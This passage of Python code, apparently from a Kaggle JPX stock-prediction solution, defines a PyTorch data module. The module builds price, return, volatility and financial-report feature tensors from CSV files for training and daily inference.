fold='EVAL', secondary_data=False, settings=None):\n\n super(JPXdataModule, self).__init__()\n\n self.mode = mode\n self.fold = fold\n\n print('loading settings...')\n if settings is None:\n with open('./settings.json') as f:\n self.settings = json.load(f)\n else:\n self.settings = settings\n\n self.create_channel_files(secondary=secondary_data)\n torch.cuda.empty_cache()\n gc.collect()\n\n if mode is None:\n return\n\n if mode == 'inference':\n\n self.sto = torch.load(self.settings['CACHE_DIR'] + 'data_stocks.pt')\n self.last_date = np.max(np.unique(self.sto[:,:,0].flatten().detach().numpy())[:-1])\n self.unique_secus = np.unique(self.sto[:,:,1].flatten().detach().numpy())[:-1]\n self.sto = self.sto[-1].unsqueeze(0).cuda()\n\n self.pri = torch.load(self.settings['CACHE_DIR'] + 'last_prices.pt').cuda()\n self.upd = torch.load(self.settings['CACHE_DIR'] + 'last_updates.pt')[-1].unsqueeze(0).cuda()\n\n self.prepro_means_por = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_por_{}.pt'.format(fold)).cuda()\n self.prepro_means_ret = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_ret_{}.pt'.format(fold)).cuda()\n self.prepro_means_vol = torch.load(self.settings['CACHE_DIR'] + 'prepro_means_vol_{}.pt'.format(fold)).cuda()\n\n self.prepro_stds_por = torch.load(self.settings['CACHE_DIR'] + 'prepro_stds_por_{}.pt'.format(fold)).cuda()\n self.prepro_stds_ret = torch.load(self.settings['CACHE_DIR'] + 'prepro_stds_ret_{}.pt'.format(fold)).cuda()\n self.prepro_stds_vol = torch.load(self.settings['CACHE_DIR'] + 
'prepro_stds_vol_{}.pt'.format(fold)).cuda()\n\n else:\n\n sto = torch.load(self.settings['CACHE_DIR'] + 'data_stocks.pt').cuda()\n tar = torch.load(self.settings['CACHE_DIR'] + 'data_targets.pt').cuda()\n\n is_active = sto[:,:,-1]\n\n if fold == 'EVAL':\n\n lenght = len(sto)\n block_size = 126\n\n is_train = np.ones(lenght)\n is_train[:(lenght % block_size)] = 0\n is_train[-block_size:] = 0\n is_train = is_train==1\n\n is_valid = np.zeros(lenght)\n is_valid[-block_size:] = 1\n is_valid = is_valid==1\n\n elif fold.startswith('CV'):\n\n jump = int(fold[-2])\n shift = int(fold[-1])\n\n is_train = (np.arange(len(tar)) + shift) % jump != 0\n is_valid = ~is_train\n\n else:\n\n raise Exception('Unknown split method')\n\n if mode == 'returns_classification':\n\n self.batch_size = 3\n\n ret = torch.load(self.settings['CACHE_DIR'] + 'data_returns.pt').cuda()\n volatility = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()[:,:,3]\n\n self.x = torch.cat(self.pre_process(ret, sto, is_train, 'ret'), dim=-1)\n self.y = tar[:,:,0]\n self.w = is_active * torch.clip(0.025 - torch.abs(volatility - 0.025), 0)\n\n elif mode == 'volatility_classification':\n\n self.batch_size = 3\n\n vol = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()\n self.x = torch.cat(self.pre_process(vol, sto, is_train, 'vol'), dim=-1)\n self.y = tar[:,:,1]\n self.w = is_active\n\n elif mode == 'portfolio_optimization':\n\n self.batch_size = 126\n\n fin = torch.load(self.settings['CACHE_DIR'] + 'data_finances.pt').cuda()\n ret = torch.load(self.settings['CACHE_DIR'] + 'data_returns.pt').cuda()\n vol = torch.load(self.settings['CACHE_DIR'] + 'data_volatility.pt').cuda()\n ret_probs = torch.load(self.settings['CACHE_DIR'] + 'pred_returns_classification_{}.pt'.format(fold)).cuda().unsqueeze(-1)\n vol_probs = torch.load(self.settings['CACHE_DIR'] + 'pred_volatility_classification_{}.pt'.format(fold)).cuda().unsqueeze(-1)\n\n # fin tensor features:\n # quaterly_diff, annual_diff, forecasts_diff, forecasts_ann, eq_to_asset, \n # days_since_last_update, days_since_last_annual_update, days_since_last_forecast, \n # profit_type, market_cap, is_year_update, is_forecast, update_types\n\n fin[:,:,-8:-5] = transform_num_days(fin[:,:,-8:-5]) # days_since_last_update\n fin[:,:,-4] = 1. 
*(fin[:,:,-4] < 8e9) # is_illiquid\n\n fin = torch.cat(( ret[:,:,:8], \n vol[:,:,:8], \n fin),\n dim=-1)\n\n feats, feats_common = self.pre_process(fin[:,:,:-5], sto, is_train, 'por')\n\n update_types = F.one_hot(fin[:,:,-1].long())\n profit_types = F.one_hot(fin[:,:,-5].long())\n binary_feats = fin[:,:,-4:-1]\n\n vol_weights = - torch.clip(vol[:,:,3],0,0.05).unsqueeze(-1)\n\n self.x = torch.cat(( ret_probs - 0.5, 0.5 - vol_probs, vol_weights,\n feats, profit_types, binary_feats, update_types, feats_common), dim=-1)\n self.y = tar[:,:,0]\n self.w = is_active\n\n else:\n\n raise Exception('Unknown training_mode')\n\n self.x = self.x.detach().cpu().numpy()\n self.y = self.y.detach().cpu().numpy()\n\n gc.collect()\n torch.cuda.empty_cache()\n\n print('train len:',len(self.x[is_train]))\n print('val len:',len(self.x[~is_train]))\n\n self.train_ds = JpxDataSet(self.x[is_train], self.y[is_train], self.w[is_train])\n self.val_ds = JpxDataSet(self.x[is_valid], self.y[is_valid], self.w[is_valid])\n self.all_ds = JpxDataSet(self.x, self.y, self.w)\n\n def pre_process(self, feats, sto, is_train, cache_label):\n\n feats = torch.clip(feats, -5000, 5000)\n\n feats = torch.nan_to_num(feats)\n sto = torch.nan_to_num(sto)\n\n day_means = torch.mean(feats, dim=1).unsqueeze(1)\n day_means = torch.repeat_interleave(day_means, feats.shape[1], dim=1)\n feats = torch.cat((feats - day_means, day_means), dim=-1)\n\n stds, means = torch.std_mean(feats[is_train], dim=(0,1))\n feats = (feats - means) / (stds + 1e-6)\n\n torch.save(means.detach().cpu(), self.settings['CACHE_DIR'] + 'prepro_means_{}_{}.pt'.format(cache_label,self.fold))\n torch.save(stds.detach().cpu(), self.settings['CACHE_DIR'] + 'prepro_stds_{}_{}.pt'.format(cache_label,self.fold))\n\n exchange_segment_id = F.one_hot(sto[:,:,3].long() - 1)\n sector_id = F.one_hot(sto[:,:,4].long() - 1)\n index_id = F.one_hot(sto[:,:,5].long())\n\n sto = torch.cat(( exchange_segment_id,\n sector_id,\n index_id,\n sto[:,:,-3:]\n ), dim=-1)\n\n return feats, sto\n\n def pre_process_for_inference_feat(self, feats, cache_label):\n\n feats = torch.clip(feats, -5000, 5000)\n feats = torch.nan_to_num(feats)\n\n day_means = torch.mean(feats, dim=1).unsqueeze(1)\n day_means = torch.repeat_interleave(day_means, feats.shape[1], dim=1)\n feats = torch.cat((feats - day_means, day_means), dim=-1)\n\n if cache_label == 'ret':\n feats = (feats - self.prepro_means_ret) / (self.prepro_stds_ret + 1e-6)\n elif cache_label == 'vol':\n feats = (feats - self.prepro_means_vol) / (self.prepro_stds_vol + 1e-6)\n elif cache_label == 'por':\n feats = (feats - self.prepro_means_por) / (self.prepro_stds_por + 1e-6)\n else:\n raise Exception()\n\n return feats\n\n def pre_process_for_inference_sto(self, sto):\n\n sto = torch.nan_to_num(sto)\n\n exchange_segment_id = F.one_hot(sto[:,:,3].long() - 1, num_classes=3)\n sector_id = F.one_hot(sto[:,:,4].long() - 1, num_classes=17)\n index_id = F.one_hot(sto[:,:,5].long(), num_classes=8)\n\n sto = torch.cat(( exchange_segment_id,\n sector_id,\n index_id,\n sto[:,:,-3:]\n ), dim=-1)\n\n return sto\n\n def process_day_for_inference(self, prices_csv, financials_csv):\n\n prices_csv = prices_csv[[ 'Date', 'SecuritiesCode', 'Open', 'High', 'Low', 'Close', 'Volume', \n 'AdjustmentFactor', 'ExpectedDividend', 'SupervisionFlag']]\n\n prices_csv.Date = from_date_to_int(prices_csv.Date)\n prices_csv = prices_csv.to_numpy(np.float32)\n\n # series tensor dims: time, security, channel\n new_date = prices_csv[-1,0].item()\n\n # this is just for kaggle public LB which 
uses old validation data\n        if new_date <= self.last_date:\n            self.last_date = new_date - 1\n\n        d0 = int(new_date - self.last_date)\n        d1 = len(self.unique_secus)\n\n        self.last_date = new_date\n\n        ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n        self.sto[:,:,0] = new_date\n        self.sto[:,:,-3:] = 0 # expected_dividend, under_supervision, is_active\n\n        tensor_pri = np.empty((d0, d1, 5), dtype=np.float32); tensor_pri[:] = np.nan\n\n        for sec_id in range(len(self.unique_secus)):\n\n            sec = self.unique_secus[sec_id]\n            sec_rows_prices = prices_csv[prices_csv[:,1] == sec]\n\n            adj_factor = self.sto[-1,sec_id,2].item()\n\n            if len(sec_rows_prices) > 0:\n\n                tensor_pri[-1,sec_id,:] = sec_rows_prices[:,2:7]\n                tensor_pri[-1,sec_id,:4] /= adj_factor\n                tensor_pri[-1,sec_id,4] *= adj_factor\n\n                #!!! keep this code block AFTER adj_factor is applied to prices and volume\n                self.sto[:,sec_id,2] *= np.nan_to_num(sec_rows_prices[:,-3], nan=1).item() # adj_factor \n                self.sto[:,sec_id,-3] = 1.*(sec_rows_prices[:,-2] > 0).item() # expected_dividend\n                self.sto[:,sec_id,-2] = 1.*(sec_rows_prices[:,-1] ==1).item() # under_supervision\n                self.sto[:,sec_id,-1] = 1 # is_active\n            else:\n                tensor_pri[-1,sec_id,:] = np.nan\n                self.sto[:,sec_id,2] *= 1 \n                self.sto[:,sec_id,-3:] = 0\n\n        self.pri = torch.cat((self.pri, torch.from_numpy(tensor_pri).cuda()), dim=0)[-112:]\n\n        ret, vol = self.get_ta_channels(self.pri)\n        ret = ret[-1].unsqueeze(0)\n        vol = vol[-1].unsqueeze(0)\n\n        ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n        # financials_csv = financials_csv[[ 'Date', 'SecuritiesCode',\n        #                         'AverageNumberOfShares','EquityToAssetRatio','UpdateType',\n        #                         'NetSales','OperatingProfit','OrdinaryProfit','EarningsPerShare',\n        #                         'ForecastNetSales','ForecastOperatingProfit','ForecastOrdinaryProfit','ForecastEarningsPerShare']]\n\n        financials_csv = self.process_financials_csv(financials_csv)\n        financials_csv = financials_csv.to_numpy(np.float32)\n        financials_csv = torch.from_numpy(financials_csv).cuda()\n\n        # statements_last, forecasts_last, quaterly_updates, eq_to_asset, \n        # days_since_last_update, days_since_last_annual_update, days_since_last_forecast, \n        # profit_type, market_cap, is_year_update, is_forecast, update_types\n\n        tensor_upd = torch.empty((d0, d1, 33), dtype=torch.float32, device=self.upd.device); tensor_upd[:] = np.nan\n\n        # increment the day counters; reset the update flags\n        tensor_upd[:] = self.upd[-1].unsqueeze(0)\n        tensor_upd[-1,:,-8:-5] += d0 # day counters\n        tensor_upd[-1,:,-5] = 0 # profit_type\n        tensor_upd[-1,:,-3:] = 0 # is_year_update, is_forecast, update_types\n\n        close = self.pri[-1,:,3]\n\n        # compute the difference between self.fin and financials; copy the difference with num_days = 0; update self.fin\n        for i in range(len(financials_csv)):\n\n            update = financials_csv[i]\n            sec = update[1].item()\n\n            if not sec in self.unique_secus:\n                continue\n\n            sec_id = np.argwhere(self.unique_secus==sec).item()\n            num_of_shares = float(update[2])\n            eq_to_asset = float(update[3])\n            update_type = float(update[4])\n            profit = float(update[7])\n            market_cap = num_of_shares * close[sec_id]\n            is_forecast = 0\n\n            if math.isnan(eq_to_asset):\n                eq_to_asset = tensor_upd[-1,sec_id,-9]\n\n            if market_cap.isnan().item():\n                market_cap = tensor_upd[-1,sec_id,-4]\n\n            if (~update[9:13].isnan()).all():\n\n                forecasts = update[9:13]\n                forecasts[:3] /= market_cap\n                forecasts[-1] /= close[sec_id]\n\n                tensor_upd[-1,sec_id,-6] = 0\n                tensor_upd[-1,sec_id,4:8] = 
forecasts\n\n is_forecast = 1\n\n if update_type > 0:\n\n statements = update[5:9]\n statements[:3] /= market_cap\n statements[-1] /= close[sec_id]\n\n profit_type = 0\n if profit > 0 and statements[2] < 0: profit_type = 1\n if profit < 0 and statements[2] > 0: profit_type = 2\n\n tensor_upd[-1,sec_id,-5] = profit_type\n tensor_upd[-1,sec_id,-8] = 0\n\n previous_values = tensor_upd[-1,sec_id,:24].clone()\n tensor_upd[-1,sec_id,:4] = statements\n\n if update_type == 1:\n tensor_upd[-1,sec_id,8:12] = statements\n elif update_type == 2:\n tensor_upd[-1,sec_id,12:16] = statements\n elif update_type == 3:\n tensor_upd[-1,sec_id,16:20] = statements\n elif update_type == 4:\n tensor_upd[-1,sec_id,20:24] = statements\n tensor_upd[-1,sec_id,-7] = 0\n\n tensor_upd[-1,sec_id,:24] = torch.nan_to_num(tensor_upd[-1,sec_id,:24]) + torch.isnan(tensor_upd[-1,sec_id,:24]) * previous_values\n\n tensor_upd[-1,sec_id,-9] = eq_to_asset\n tensor_upd[-1,sec_id,-4] = market_cap\n tensor_upd[-1,sec_id,-3] = 1. * (update_type==4)\n tensor_upd[-1,sec_id,-2] = is_forecast\n tensor_upd[-1,sec_id,-1] = update_type\n\n self.upd = tensor_upd[-1].unsqueeze(0)\n fin = self.get_fi_channels(tensor_upd)[-1].unsqueeze(0)\n\n fin[:,:,-8:-5] = transform_num_days(fin[:,:,-8:-5]) # days_since_last_update\n fin[:,:,-4] = 1. *(fin[:,:,-4] < 8e9) # is_illiquid\n\n update_types = F.one_hot(fin[:,:,-1].long(), num_classes=5)\n profit_types = F.one_hot(fin[:,:,-5].long(), num_classes=3)\n binary_feats = fin[:,:,-4:-1]\n\n fin = torch.cat(( ret[:,:,:8],\n vol[:,:,:8],\n fin),\n dim=-1)\n\n fin = self.pre_process_for_inference_feat(fin[:,:,:-5], 'por')\n\n vol_weights = - torch.clip(vol[:,:,3],0,0.05).unsqueeze(-1)\n fin = torch.cat((vol_weights, fin, profit_types, binary_feats, update_types), dim=-1)\n\n sto = self.pre_process_for_inference_sto(self.sto)\n ret = self.pre_process_for_inference_feat(ret, 'ret')\n vol = self.pre_process_for_inference_feat(vol, 'vol')\n\n return sto, ret, vol, fin\n\n def process_financials_csv(self, financials_csv):\n\n financials_csv = financials_csv[~financials_csv.TypeOfDocument.isna()]\n\n financials_csv['UpdateType'] = -1\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('1Q'), 'UpdateType'] = 1\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('2Q'), 'UpdateType'] = 2\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('3Q'), 'UpdateType'] = 3\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('FY'), 'UpdateType'] = 4\n financials_csv.loc[financials_csv.TypeOfDocument.str.startswith('Forecast'), 'UpdateType'] = 0\n financials_csv = financials_csv[financials_csv.UpdateType > -1]\n\n financials_csv = financials_csv[[ 'Date', 'SecuritiesCode',\n 'AverageNumberOfShares','EquityToAssetRatio','UpdateType',\n 'NetSales','OperatingProfit','OrdinaryProfit','EarningsPerShare',\n 'ForecastNetSales','ForecastOperatingProfit','ForecastOrdinaryProfit','ForecastEarningsPerShare']]\n financials_csv.Date = from_date_to_int(financials_csv.Date)\n financials_csv = financials_csv.replace('-',np.nan)\n\n return financials_csv\n\n def get_stock_info(self, sec):\n\n if not hasattr(self, 'stock_dico'):\n\n self.stock_dico = pd.read_csv(self.settings['ROOT_DIR'] + 'stock_list.csv')\n self.stock_dico = self.stock_dico.set_index('SecuritiesCode')\n\n try:\n segment_id = self.stock_dico.loc[sec]['NewMarketSegment']\n\n if segment_id.startswith('Prime'): segment_id = 1.\n elif segment_id.startswith('Standard'): segment_id = 2.\n elif 
segment_id.startswith('Growth'): segment_id = 3.\n else: segment_id = 0.\n except:\n segment_id = 0.\n\n try:\n # if self.use33SectorCode:\n # sector_id = float(self.stock_dico.loc[sec]['33SectorCode'])\n # else:\n sector_id = float(self.stock_dico.loc[sec]['17SectorCode'])\n except:\n sector_id = 0.\n\n try:\n index_id = float(self.stock_dico.loc[sec]['NewIndexSeriesSizeCode'])\n except:\n index_id = 0.\n\n return segment_id, sector_id, index_id\n\n def create_channel_files(self, secondary):\n\n filename = 'data_stocks_sec' if secondary else 'data_stocks'\n cached_stock_info_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created = os.path.exists(cached_stock_info_path)\n\n filename = 'data_targets_sec' if secondary else 'data_targets'\n cached_targets_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_targets_path)\n\n filename = 'data_returns_sec' if secondary else 'data_returns'\n cached_returns_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_returns_path)\n\n filename = 'data_volatility_sec' if secondary else 'data_volatility'\n cached_volatility_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_volatility_path)\n\n filename = 'data_finances_sec' if secondary else 'data_finances'\n cached_finances_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_finances_path)\n\n filename = 'last_prices_sec' if secondary else 'last_prices'\n cached_prices_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_prices_path)\n\n filename = 'last_updates_sec' if secondary else 'last_updates'\n cached_updates_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_updates_path)\n\n if files_already_created:\n return\n\n print('reading prices csv file...')\n filename = 'secondary_stock_prices' if secondary else 'stock_prices'\n stock_prices_csv = pd.concat(( pd.read_csv(self.settings['DATA_DIR'] + filename + '.csv').iloc[:,1:],\n # pd.read_csv(self.settings['SUPP_DIR'] + filename + '.csv').iloc[:,1:] \n ))\n\n stock_prices_csv.Date = from_date_to_int(stock_prices_csv.Date)\n stock_prices_csv = stock_prices_csv.to_numpy(np.float32)\n\n print('reading financials csv file...')\n financials_csv = pd.concat((pd.read_csv(self.settings['DATA_DIR'] + 'financials.csv', low_memory=False),\n # pd.read_csv(self.settings['SUPP_DIR'] + 'financials.csv', low_memory=False),\n ))\n\n financials_csv = self.process_financials_csv(financials_csv)\n financials_csv = financials_csv.to_numpy(np.float32)\n\n unique_dates = np.unique(stock_prices_csv[:,0])\n unique_secus = np.unique(stock_prices_csv[:,1])\n min_date = min(unique_dates)\n\n # series tensor dims: day, security, channel\n d0 = int(max(unique_dates) - min(unique_dates)) + 1\n d1 = len(unique_secus)\n\n tensor_sto = np.empty((d0, d1, 9), dtype=np.float32); tensor_sto[:] = np.nan\n tensor_pri = np.empty((d0, d1, 5), dtype=np.float32); tensor_pri[:] = np.nan\n tensor_upd = np.empty((d0, d1, 11), dtype=np.float32); tensor_upd[:] = np.nan\n tensor_tar = np.empty((d0, d1, 2), dtype=np.float32); tensor_tar[:] = np.nan\n\n print('creating tensors from csv files...')\n for sec_idx in tqdm(range(len(unique_secus))):\n\n sec = unique_secus[sec_idx].item()\n\n sec_rows_prices = stock_prices_csv[stock_prices_csv[:,1] == sec]\n sec_rows_financials = 
financials_csv[financials_csv[:,1] == sec]\n\n days_prices = list(map(int,sec_rows_prices[:,0] - min_date))\n days_financials = list(map(int,sec_rows_financials[:,0] - min_date))\n\n segment_id, sector_id, index_id = self.get_stock_info(sec)\n\n tensor_sto[days_prices,sec_idx,:2] = sec_rows_prices[:,:2] # date, security_id\n tensor_sto[days_prices,sec_idx,2] = sec_rows_prices[:,7] # adjustment_factor\n tensor_sto[:,sec_idx,3] = segment_id\n tensor_sto[:,sec_idx,4] = sector_id\n tensor_sto[:,sec_idx,5] = index_id\n tensor_sto[days_prices,sec_idx,6] = 1.*(sec_rows_prices[:,-3] > 0) # expected_dividend\n tensor_sto[days_prices,sec_idx,7] = sec_rows_prices[:,-2] # under_supervision\n tensor_sto[days_prices,sec_idx,8] = 1 # is_active\n\n tensor_pri[days_prices,sec_idx,:] = sec_rows_prices[:,2:7] # prices, volume\n tensor_tar[days_prices,sec_idx,0] = sec_rows_prices[:,-1] # target\n tensor_upd[days_financials,sec_idx,:] = sec_rows_financials[:,2:] # num_of_shares, eq_to_asset, type of update, statement, forecasts\n\n # filling nans with 0s for expected_dividend, under_supervision and is_active\n tensor_sto[:,:,-3:] = np.nan_to_num(tensor_sto[:,:,-3:])\n # filling a few targets with missing values with 0\n tensor_tar = np.nan_to_num(tensor_tar)\n\n print('adjusting prices after share splits...')\n tensor_sto[:,:,2] = np.nan_to_num(tensor_sto[:,:,2], nan=1)\n tensor_sto[:,:,2] = np.cumprod(tensor_sto[:,:,2], axis=0)\n adj_factor = np.expand_dims(tensor_sto[:-1,:,2], axis=-1)\n tensor_pri[1:,:,:4] /= adj_factor # prices\n tensor_pri[1:,:,4:5] *= adj_factor # volume\n\n print('imputing prices and creating rolling channels...')\n tensor_pri = torch.from_numpy(tensor_pri).cuda()\n tensor_ret, tensor_vol = self.get_ta_channels(tensor_pri)\n torch.cuda.empty_cache()\n\n close = tensor_pri[:,:,3:4]\n tensor_upd = torch.from_numpy(tensor_upd).cuda()\n tensor_upd = self.get_report_updates(tensor_upd, close)\n print('processing updates and forecasts diffs...')\n tensor_fin = self.get_fi_channels(tensor_upd)\n torch.cuda.empty_cache()\n\n tensor_sto = torch.from_numpy(tensor_sto).cuda()\n tensor_tar = torch.from_numpy(tensor_tar).cuda()\n\n is_active = tensor_sto[:,:,-1]\n is_bank_holiday = (is_active==0).all(dim=-1)\n tensor_sto = tensor_sto[~is_bank_holiday]\n tensor_ret = tensor_ret[~is_bank_holiday]\n tensor_vol = tensor_vol[~is_bank_holiday]\n tensor_fin = tensor_fin[~is_bank_holiday]\n tensor_tar = tensor_tar[~is_bank_holiday]\n torch.cuda.empty_cache()\n\n missing_targets = tensor_tar[:,:,0].sum(dim=-1)==0\n tensor_sto = tensor_sto[~missing_targets]\n tensor_ret = tensor_ret[~missing_targets]\n tensor_vol = tensor_vol[~missing_targets]\n tensor_fin = tensor_fin[~missing_targets]\n tensor_tar = tensor_tar[~missing_targets]\n\n returns_windows = tensor_ret[:,:,0].unfold(0,5,1)\n return_stds = torch_nanstd(returns_windows, dim=-1).unsqueeze(-1)\n return_stds = extend(return_stds, len(tensor_ret))\n return_stds_future = torch.roll(return_stds,-4,0)\n return_stds_future[-4:] = np.nan\n return_stds_future[-5:] = impute(return_stds_future[-5:], backpass=False)\n tensor_tar[:,:,1] = return_stds_future.squeeze()\n\n print('saving tensor files...')\n torch.save(tensor_sto.detach().cpu(), cached_stock_info_path)\n torch.save(tensor_pri[-112:].detach().cpu(), cached_prices_path)\n torch.save(tensor_upd[-1].unsqueeze(0).detach().cpu(), cached_updates_path)\n torch.save(tensor_tar.detach().cpu(), cached_targets_path)\n torch.save(tensor_ret.detach().cpu(), cached_returns_path)\n 
torch.save(tensor_vol.detach().cpu(), cached_volatility_path)\n torch.save(tensor_fin.detach().cpu(), cached_finances_path)\n\n def get_report_updates(self, tensor_upd, close):\n\n # num_of_shares, eq_to_asset, type of update, statement (4), forecast (4)\n\n print('processing num_of_shares, eq_to_asset, market_cap...')\n tensor_upd[:,:,:2] = impute(tensor_upd[:,:,:2])\n num_of_shares = tensor_upd[:,:,0:1]\n num_of_shares = torch.nan_to_num(num_of_shares, nan=torch.nanmedian(num_of_shares))\n eq_to_asset = tensor_upd[:,:,1:2]\n eq_to_asset = torch.nan_to_num(eq_to_asset, nan=torch.nanmedian(eq_to_asset))\n market_cap = num_of_shares * impute(close)\n market_cap = torch.nan_to_num(market_cap, nan=torch.nanmedian(market_cap))\n\n print('processing profits...')\n statements = tensor_upd[:,:,3:7]\n statements[:,:,:3] /= market_cap\n statements[:,:,3:4] /= close\n statements_last = impute(statements)\n for i in range(4):\n statements_last[:,:,i] = impute_with_medians(statements_last[:,:,i])\n profit = statements_last[:,:,2:3]\n\n update_types = tensor_upd[:,:,2:3]\n is_forecast = 1. * ~update_types.isnan()\n update_types = torch.nan_to_num(update_types)\n is_year_update = 1. * (update_types == 4)\n\n quaterly_updates = []\n\n print('processing quaterly updates...')\n for update_type in range(1,5):\n\n quaterly_upd = torch.empty_like(update_types); quaterly_upd[:] = np.nan\n quaterly_upd[update_types==update_type] = 1.\n quaterly_upd = quaterly_upd * statements\n\n quaterly_upd = impute(quaterly_upd)\n\n for i in range(4):\n quaterly_upd[:,:,i] = impute_with_medians(quaterly_upd[:,:,i]) \n\n quaterly_updates.append(quaterly_upd)\n\n quaterly_updates = torch.cat(quaterly_updates, dim=-1)\n\n print('processing forecasts...')\n forecasts_last = tensor_upd[:,:,7:]\n forecasts_last[:,:,:3] /= market_cap\n forecasts_last[:,:,3:4] /= close\n forecasts_last = impute(forecasts_last)\n # Some securities don't provide forecast, we use the median of the market last forecast:\n for i in range(4):\n forecasts_last[:,:,i] = impute_with_medians(forecasts_last[:,:,i])\n\n days_since_last_update = torch.empty_like(update_types); days_since_last_update[:] = np.nan\n days_since_last_annual_update = torch.empty_like(update_types); days_since_last_annual_update[:] = np.nan\n days_since_last_forecast = torch.empty_like(update_types); days_since_last_forecast[:] = np.nan\n profit_type = torch.zeros_like(update_types)\n\n print('processing number of days since last update and profit types...')\n for day in range(len(update_types)):\n\n if day > 0:\n\n days_since_last_update[day] = days_since_last_update[day-1] + 1\n days_since_last_annual_update[day] = days_since_last_annual_update[day-1] + 1\n days_since_last_forecast[day] = days_since_last_forecast[day-1] + 1\n\n break_even = (profit[day-1] < 0) & (profit[day] > 0)\n going_south = (profit[day-1] > 0) & (profit[day] < 0)\n profit_type[day] = torch.where(break_even, torch.ones_like(profit_type[day]), torch.where(going_south, 2., 0.))\n\n days_since_last_update[day, update_types[day]>0] = 0\n days_since_last_annual_update[day, is_year_update[day]==1] = 0\n days_since_last_forecast[day, is_forecast[day]==1] = 0\n\n days_since_last_update = impute_with_medians(days_since_last_update)\n days_since_last_annual_update = impute_with_medians(days_since_last_annual_update)\n days_since_last_forecast = impute_with_medians(days_since_last_forecast)\n\n return torch.cat(( statements_last, forecasts_last, quaterly_updates, eq_to_asset, \n days_since_last_update, 
days_since_last_annual_update, days_since_last_forecast, \n profit_type, market_cap, is_year_update, is_forecast, update_types), dim=-1)\n\n def get_fi_channels(self, tensor_upd):\n\n updates = tensor_upd[:,:,4:]\n\n quaterly_upd = updates[:,:,4:20]\n annual_upd = updates[:,:,16:20].clone()\n forecasts = updates[:,:,:4]\n\n update_types = updates[:,:,-1].unsqueeze(-1)\n is_forecast = updates[:,:,-2].unsqueeze(-1)\n\n last_upd_type = torch.empty_like(update_types); last_upd_type[:] = np.nan\n last_upd_type[update_types>0] = update_types[update_types>0]\n last_upd_type = impute(last_upd_type)\n\n quaterly_diff = torch.diff(quaterly_upd, dim=0)\n quaterly_diff = extend(quaterly_diff, len(updates), blank=0)\n\n quaterly_diff[:,:,:4] = quaterly_diff[:,:,:4] * torch.where(update_types==1., 1., np.nan)\n quaterly_diff[:,:,4:8] = quaterly_diff[:,:,4:8] * torch.where(update_types==2., 1., np.nan)\n quaterly_diff[:,:,8:12] = quaterly_diff[:,:,8:12] * torch.where(update_types==3., 1., np.nan)\n quaterly_diff[:,:,12:] = quaterly_diff[:,:,12:] * torch.where(update_types==4., 1., np.nan)\n\n quaterly_diff = torch.nan_to_num(impute(quaterly_diff))\n\n quaterly_diff[:,:,12:] -= quaterly_diff[:,:,8:12]\n quaterly_diff[:,:,8:12] -= quaterly_diff[:,:,4:8]\n quaterly_diff[:,:,4:8] -= quaterly_diff[:,:,:4]\n\n quaterly_diff = quaterly_diff[:,:,:4] * (last_upd_type==1) + \\\n quaterly_diff[:,:,4:8] * (last_upd_type==2) + \\\n quaterly_diff[:,:,8:12] * (last_upd_type==3) + \\\n quaterly_diff[:,:,12:] * (last_upd_type==4)\n\n annual_diff = torch.diff(annual_upd, dim=0)\n annual_diff = extend(annual_diff, len(updates))\n annual_diff *= torch.where(update_types==4., 1., np.nan)\n annual_diff = torch.nan_to_num(impute(annual_diff))\n\n forecasts_diff = torch.diff(forecasts, dim=0)\n forecasts_diff = extend(forecasts_diff, len(updates))\n forecasts_diff *= torch.where(is_forecast==1., 1., np.nan)\n forecasts_diff = torch.nan_to_num(impute(forecasts_diff))\n\n forecasts_ann = torch.nan_to_num(forecasts - annual_upd)\n\n return torch.cat((quaterly_diff, annual_diff, forecasts_diff, forecasts_ann, updates[:,:,20:]), dim=-1)\n\n def get_ta_channels(self, tensor_pri):\n\n num_days = len(tensor_pri)\n\n tensor_ret = torch.empty((num_days, tensor_pri.shape[1], 43), dtype=torch.float32, device=tensor_pri.device); tensor_ret[:] = np.nan\n tensor_vol = torch.empty((num_days, tensor_pri.shape[1], 43), dtype=torch.float32, device=tensor_pri.device); tensor_vol[:] = np.nan\n\n open = tensor_pri[:,:,0:1]\n high = tensor_pri[:,:,1:2]\n low = tensor_pri[:,:,2:3]\n close = tensor_pri[:,:,3:4]\n volume = tensor_pri[:,:,4:5]\n\n prev_close = torch.roll(close,1,0)\n prev_close[0] = prev_close[1]\n\n prev_high = torch.roll(high,1,0)\n prev_high[0] = prev_high[1]\n\n prev_low = torch.roll(low,1,0)\n prev_low[0] = prev_low[1]\n\n exec_cap = volume * (high + low + close) / 3\n zeros = torch.zeros_like(exec_cap)\n\n returns = extend(torch.diff(torch.log(impute(close)), dim=0), num_days, blank=0)\n returns = torch.clip(returns, -0.2, 0.2)\n returns_prev = torch.roll(returns,1,0)\n returns_prev[0] = 0\n returns[close.isnan()] = np.nan\n returns_prev[close.isnan()] = np.nan\n tensor_ret[:,:,0] = returns.squeeze()\n tensor_ret[:,:,1] = returns_prev.squeeze()\n\n close_open_unbalance = close / open - 1\n close_open_unbalance = torch.clip(close_open_unbalance, -0.2, 0.2)\n tensor_ret[:,:,2] = close_open_unbalance.squeeze()\n\n returns_windows = returns.unfold(0,7,1)\n vol = torch_nanstd(returns_windows, dim=-1)\n vol = extend(vol, num_days)\n 
